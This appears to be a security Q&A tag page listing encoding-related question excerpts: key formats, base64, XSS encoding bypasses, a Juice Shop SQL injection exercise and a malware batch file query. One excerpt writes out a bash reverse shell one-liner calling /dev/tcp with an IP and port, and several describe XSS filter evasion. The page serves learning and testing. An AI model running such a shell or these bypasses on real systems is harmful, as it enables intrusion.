Questions tagged [encoding]
Encoding is a set of predefined rules to reversibly transform a piece of information in a certain representation into a completely different representation. The other way round is called decoding.
208
questions
1
vote
1
answer
40
views
How to generate an X9.62 encoded ECDSA prime256v1 private key using OpenSSL?
I created a private key using Analog device's signtool. It can be found part of "CrossCore Embedded Studio for Blackfin, SHARC and SHARC+ - Release (Rev. 2.12.0)". Link: https://www.analog....
1
vote
0
answers
99
views
Can anyone decipher this .BAT malware? [closed]
Its a 3.37MB batch file. When opened in Notepad/++ it's all Chinese and some unknown characters. It's still remaining largely undetectable despite being launched in the wild more than 2 days ago, ...
1
vote
0
answers
201
views
When we url encode (") will become (%22), is there any way we can decode (")?
While studying the XSS vulnerability, I encountered a significant doubt. I noticed that when we include " in a URL, it gets encoded as %22. Therefore, I believe we can utilize the decoded version ...
0
votes
1
answer
172
views
React chars to HTML encode?
I've observed that React can HTML encode specific characters to prevent XSS vulnerabilities in certain contexts. For instance, consider the following code in App.jsx:
function App() {
const ...
1
vote
0
answers
97
views
How to use html encoded characters to perform XSS?
I am trying to perform XSS but to get out of the context and write the payload I need to use Angle brackets and the angle brackets are html encoded. I tried double encoding technique with url encoding+...
1
vote
0
answers
440
views
Documentation on mobile-webview.gmail.com link masking?
Several google products (mainly Gmail) masks links using a fake-dns mobile-webview.gmail.com
That domain doesn't resolve anywhere, not even Google's own NS https://dnschecker.org/#A/mobile-webview....
-1
votes
1
answer
112
views
Is encoding random with module insecure? [closed]
The ID library Nano ID claims that modulo based encoding (e.g. Base64) would lead to uneven distribution in the output:
Uniformity. random % alphabet is a popular mistake to make when coding an ID ...
0
votes
0
answers
748
views
Bash reverse shell as a URL parameter value
I try to put bash reverse shell as a URL parameter. The command is as follows:
bash -i >& /dev/tcp/192.168.56.105/4444 0>&1
I have encoded the above code with URL encoding
bash%20-i%20%...
1
vote
1
answer
291
views
What sort of cookie is this website giving users
I am doing some research into scam websites (particularly the ones where you receive a text message telling you you have an undelivered package, or unpaid tolls etc and they provide you with a link to ...
-2
votes
1
answer
291
views
Using base64 for secure encoding [duplicate]
Now this may seem like a stupid question, but it just occurred to me: How secure is base64 encoding compared to (plain) hashing?
Nobody can read base64 code by itself, but it still isn't that hard to ...
1
vote
1
answer
1k
views
XSS in document.write(location.href)
Let's say a website contains the following <script> tag and does not have a CSP blocking any execution here.
<script type="text/javascript">
document.write(location.href)
</...
1
vote
0
answers
35
views
Decrypting a Base64 ciphertext [duplicate]
I am working on a challenge that includes decrypting a piece of ciphertext. The sample decryption provided is as follows:
...
1
vote
0
answers
592
views
force XSS after bypassing Request.Form using URL Encoding
I am testing a cross-site scripting attack on a website, as we all know the Request.Form function validates the input so the user couldn't insert a <script> inside the input.
My focus in this ...
5
votes
5
answers
5k
views
Randomly generated secrets: encoding the random bytes in base64 vs keeping them
Today this came to my attention.
When generating random secrets for e.g. JWT (in node.js the most common way is using the crypto.randomBytes() method), I have noticed a lot of people save these tokens ...
0
votes
1
answer
408
views
Burp Suite: alphanumeric payload decoded to base64 exposes password, but as an encoded string
I'm learning Web Pentesting using Juice Shop and I successfully used Burp Suite to generate an SQL injection payload in the repeater that exposed the plain text email and encoded password of the admin....